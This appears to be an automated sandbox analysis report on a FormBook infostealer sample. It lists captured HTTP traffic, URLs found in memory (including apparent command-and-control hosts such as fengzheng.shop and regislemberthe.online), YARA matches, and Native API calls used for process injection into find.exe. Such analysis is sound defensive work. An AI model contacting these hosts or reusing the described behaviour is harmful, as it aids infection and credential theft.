                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 26 Nov 2024 08:29:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kzSX5KwzPEehZwDaykoMuLeNcZsKzStc9zadiFs5COioq0Rs9RatAy%2FlHHqce8rviVhARPv%2F1hZh19XhBlvrzBxOKSOZjOs%2FE2L2t1vQUwpEPclPLPPFQL%2BVBjVJyI20qs%2BT%2B9TMFQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e888357e93e4379-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2132&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=192&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 61 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 45 97 43 36 a2 e0 c2 95 27 48 9c b1 09 a4 93 32 66 61 6f 2f 55 0b e2 da a5 ab 07 ef e7 e3 61 ac 43 76 6d 83 91 3d 39 ac a9 66 76 db f5 06 0e 45 43 22 62 41 fb 32 d1 3e 2b 6d 83 a1 d0 34 eb 85 a5 b2 3a 8c dd f7 22 76 0e ed 3b 9e d9 ea 96 b2 f4 49 ee 9f 99 5d 68 76 79 b2 32 06 3c 8c 9e 28 49 0f b5 00 a5 9b 0f 99 e1 74 3e ee c1 0b c1 2e 6a 19 18 ae 9a 58 28 4f c0 aa 45 61 f4 3d 83 31 7f c4 af 11 0f 5b 30 e7 0b 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a6M0a<@EC6'H2fao/UaCvm=9fvEC"bA2>+m4:"v;I]hvy2<(It>.jX(OEa=1[0$0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 26 Nov 2024 08:29:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aKhB57a8n8D5b70YlKyg78E8H4%2BFPK39SaU39fr9i1K64zzhxuNrpJJERYiTaT22AsfseSK9pzjAstZZck19q3gGpAP5UiOrUr71qYucymWzil0lh1v2CRZz277W2V3XL6C0yvqiSQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e8883689fbc42ab-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1647&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1756&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Tue, 26 Nov 2024 08:29:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPIZitb%2F5CIawpRDyT03ewKyYU1QYVC6KkknVeQ2eQ%2BviijUHj6bW827MwRmk3xnaYBo2KPONeQ8x3N0xYkI0Qn0NW4qSdtMXCrD7aqUgT9Ynn1RgE778l0Oax2IR3rkCdi70KnlbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8e88837ada2872b6-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1800&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=456&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: YpbicUfTwt.exe, 00000007.00000002.3865989919.0000000005858000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fengzheng.shop
                      Source: YpbicUfTwt.exe, 00000007.00000002.3865989919.0000000005858000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.fengzheng.shop/plc2/
                      Source: find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.regislemberthe.online/px.js?ch=1
                      Source: find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.regislemberthe.online/px.js?ch=2
                      Source: find.exe, 00000005.00000002.3865918446.00000000048A8000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.regislemberthe.online/sk-logabpstatus.php?a=alFjTmVnTnFFNS9SV3Y0RDlHR3BoMWZmc2gvcGRoa1Fye
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: find.exe, 00000005.00000002.3865918446.0000000003F3C000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000003DDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000004748000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: find.exe, 00000005.00000002.3865918446.0000000003F3C000.00000004.10000000.00040000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.0000000003DDC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://imweb.me/login
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: find.exe, 00000005.00000003.1762736872.00000000076C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Ac
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: find.exe, 00000005.00000002.3858129273.0000000000A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: find.exe, 00000005.00000002.3865918446.0000000004A3A000.00000004.10000000.00040000.00000000.sdmp, find.exe, 00000005.00000002.3867588890.0000000005C20000.00000004.00000800.00020000.00000000.sdmp, YpbicUfTwt.exe, 00000007.00000002.3863853162.00000000048DA000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: find.exe, 00000005.00000003.1771333520.0000000007798000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3854649027.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1566774721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3864375083.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3857227824.00000000009B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1567443784.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3863738708.0000000002D10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.1572202797.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042C8C3 NtClose,3_2_0042C8C3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82B60 NtClose,LdrInitializeThunk,3_2_00F82B60
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_00F82C70
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_00F82DF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F835C0 NtCreateMutant,LdrInitializeThunk,3_2_00F835C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F84340 NtSetContextThread,3_2_00F84340
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F84650 NtSuspendThread,3_2_00F84650
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82AF0 NtWriteFile,3_2_00F82AF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82AD0 NtReadFile,3_2_00F82AD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82AB0 NtWaitForSingleObject,3_2_00F82AB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82BF0 NtAllocateVirtualMemory,3_2_00F82BF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82BE0 NtQueryValueKey,3_2_00F82BE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82BA0 NtEnumerateValueKey,3_2_00F82BA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82B80 NtQueryInformationFile,3_2_00F82B80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82CF0 NtOpenProcess,3_2_00F82CF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82CC0 NtQueryVirtualMemory,3_2_00F82CC0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82CA0 NtQueryInformationToken,3_2_00F82CA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82C60 NtCreateKey,3_2_00F82C60
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82C00 NtQueryInformationProcess,3_2_00F82C00
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82DD0 NtDelayExecution,3_2_00F82DD0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82DB0 NtEnumerateKey,3_2_00F82DB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82D30 NtUnmapViewOfSection,3_2_00F82D30
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82D10 NtMapViewOfSection,3_2_00F82D10
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82D00 NtSetInformationFile,3_2_00F82D00
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82EE0 NtQueueApcThread,3_2_00F82EE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82EA0 NtAdjustPrivilegesToken,3_2_00F82EA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82E80 NtReadVirtualMemory,3_2_00F82E80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82E30 NtWriteVirtualMemory,3_2_00F82E30
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82FE0 NtCreateFile,3_2_00F82FE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82FB0 NtResumeThread,3_2_00F82FB0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82FA0 NtQuerySection,3_2_00F82FA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82F90 NtProtectVirtualMemory,3_2_00F82F90
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82F60 NtCreateProcessEx,3_2_00F82F60
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F82F30 NtCreateSection,3_2_00F82F30
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F83090 NtSetValueKey,3_2_00F83090
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F83010 NtOpenDirectoryObject,3_2_00F83010
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F839B0 NtGetContextThread,3_2_00F839B0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F83D70 NtOpenThread,3_2_00F83D70
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F83D10 NtOpenProcessToken,3_2_00F83D10
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F54340 NtSetContextThread,LdrInitializeThunk,5_2_02F54340
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F54650 NtSuspendThread,LdrInitializeThunk,5_2_02F54650
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52AF0 NtWriteFile,LdrInitializeThunk,5_2_02F52AF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52AD0 NtReadFile,LdrInitializeThunk,5_2_02F52AD0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52BF0 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_02F52BF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52BE0 NtQueryValueKey,LdrInitializeThunk,5_2_02F52BE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52BA0 NtEnumerateValueKey,LdrInitializeThunk,5_2_02F52BA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52B60 NtClose,LdrInitializeThunk,5_2_02F52B60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52EE0 NtQueueApcThread,LdrInitializeThunk,5_2_02F52EE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52E80 NtReadVirtualMemory,LdrInitializeThunk,5_2_02F52E80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52FE0 NtCreateFile,LdrInitializeThunk,5_2_02F52FE0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52FB0 NtResumeThread,LdrInitializeThunk,5_2_02F52FB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52F30 NtCreateSection,LdrInitializeThunk,5_2_02F52F30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52CA0 NtQueryInformationToken,LdrInitializeThunk,5_2_02F52CA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02F52C70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52C60 NtCreateKey,LdrInitializeThunk,5_2_02F52C60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02F52DF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52DD0 NtDelayExecution,LdrInitializeThunk,5_2_02F52DD0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52D30 NtUnmapViewOfSection,LdrInitializeThunk,5_2_02F52D30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52D10 NtMapViewOfSection,LdrInitializeThunk,5_2_02F52D10
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F535C0 NtCreateMutant,LdrInitializeThunk,5_2_02F535C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F539B0 NtGetContextThread,LdrInitializeThunk,5_2_02F539B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52AB0 NtWaitForSingleObject,5_2_02F52AB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52B80 NtQueryInformationFile,5_2_02F52B80
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52EA0 NtAdjustPrivilegesToken,5_2_02F52EA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52E30 NtWriteVirtualMemory,5_2_02F52E30
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52FA0 NtQuerySection,5_2_02F52FA0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52F90 NtProtectVirtualMemory,5_2_02F52F90
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52F60 NtCreateProcessEx,5_2_02F52F60
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52CF0 NtOpenProcess,5_2_02F52CF0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52CC0 NtQueryVirtualMemory,5_2_02F52CC0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52C00 NtQueryInformationProcess,5_2_02F52C00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52DB0 NtEnumerateKey,5_2_02F52DB0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F52D00 NtSetInformationFile,5_2_02F52D00
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F53090 NtSetValueKey,5_2_02F53090
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F53010 NtOpenDirectoryObject,5_2_02F53010
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F53D70 NtOpenThread,5_2_02F53D70
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_02F53D10 NtOpenProcessToken,5_2_02F53D10
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006E9370 NtCreateFile,5_2_006E9370
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006E94D0 NtReadFile,5_2_006E94D0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006E95C0 NtDeleteFile,5_2_006E95C0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006E9660 NtClose,5_2_006E9660
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_006E97B0 NtAllocateVirtualMemory,5_2_006E97B0
                      Source: C:\Windows\SysWOW64\find.exeCode function: 5_2_00DCF996 NtClose,5_2_00DCF996
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0146DE340_2_0146DE34
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_073204600_2_07320460
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732BAC80_2_0732BAC8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_073270A00_2_073270A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_073280E80_2_073280E8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_073204520_2_07320452
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732B3D80_2_0732B3D8
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732B3C90_2_0732B3C9
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732BAAE0_2_0732BAAE
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004188133_2_00418813
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0041000B3_2_0041000B
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004100133_2_00410013
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00416A013_2_00416A01
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00416A033_2_00416A03
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040E2093_2_0040E209
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040E2133_2_0040E213
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004102333_2_00410233
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040E3573_2_0040E357
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040E3633_2_0040E363
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0040238E3_2_0040238E
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_004023903_2_00402390
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0042EEB33_2_0042EEB3
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00402FF03_2_00402FF0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010041A23_2_010041A2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010101AA3_2_010101AA
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010081CC3_2_010081CC
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FE20003_2_00FE2000
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD81583_2_00FD8158
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FEA1183_2_00FEA118
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F401003_2_00F40100
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FD02C03_2_00FD02C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100A3523_2_0100A352
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF02743_2_00FF0274
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010103E63_2_010103E6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5E3F03_2_00F5E3F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FFE4F63_2_00FFE4F6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010105913_2_01010591
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF44203_2_00FF4420
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_010024463_2_01002446
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F505353_2_00F50535
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F6C6E03_2_00F6C6E0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4C7C03_2_00F4C7C0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F507703_2_00F50770
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F747503_2_00F74750
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F7E8F03_2_00F7E8F0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F368B83_2_00F368B8
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0101A9A63_2_0101A9A6
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F528403_2_00F52840
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5A8403_2_00F5A840
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F529A03_2_00F529A0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F669623_2_00F66962
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100AB403_2_0100AB40
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4EA803_2_00F4EA80
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_01006BD73_2_01006BD7
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F40CF23_2_00F40CF2
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FF0CB53_2_00FF0CB5
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50C003_2_00F50C00
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F4ADE03_2_00F4ADE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F68DBF3_2_00F68DBF
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FECD1F3_2_00FECD1F
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5AD003_2_00F5AD00
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F62E903_2_00F62E90
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F50E593_2_00F50E59
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F5CFE03_2_00F5CFE0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100EE263_2_0100EE26
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F42FC83_2_00F42FC8
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FCEFA03_2_00FCEFA0
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_0100CE933_2_0100CE93
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00FC4F403_2_00FC4F40
                      Source: C:\Users\user\Desktop\file.exeCode function: 3_2_00F70F303_2_00F70F30
